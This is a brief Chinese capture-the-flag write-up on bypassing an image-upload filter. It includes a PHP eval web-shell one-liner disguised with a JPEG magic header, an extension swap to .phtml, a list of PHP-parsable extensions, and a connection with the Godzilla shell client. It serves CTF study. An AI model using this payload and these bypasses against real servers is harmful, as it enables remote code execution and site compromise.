前期测试

经过测试

此题

• 要上传文件类型为图片
• 是通过文件头标志来识别文件
• 文件中不能出现<?
• 文件名后缀不能出现php

简单攻击流程

因为不能出现<?，所以我们上传文件内容可以考虑采用js+ php方案

<script language='php'>@eval($_POST["pass"]);</script>

记得添加上文件头标志FFD8FF

准备上传

抓包，修改文件后缀为.phtml

常见可解析为php的文件后缀

• .php - 这是最常见的PHP文件后缀。
• .php3 - 早期版本的PHP文件后缀。
• .php4 - 用于PHP 4版本的文件后缀。
• .php5 - 用于PHP 5版本的文件后缀。
• .phtml - 常用于HTML和PHP代码混合的文件后缀。
• .phps - 通常用于显示PHP源代码的高亮显示。

哥斯拉测试连接通过

获得flag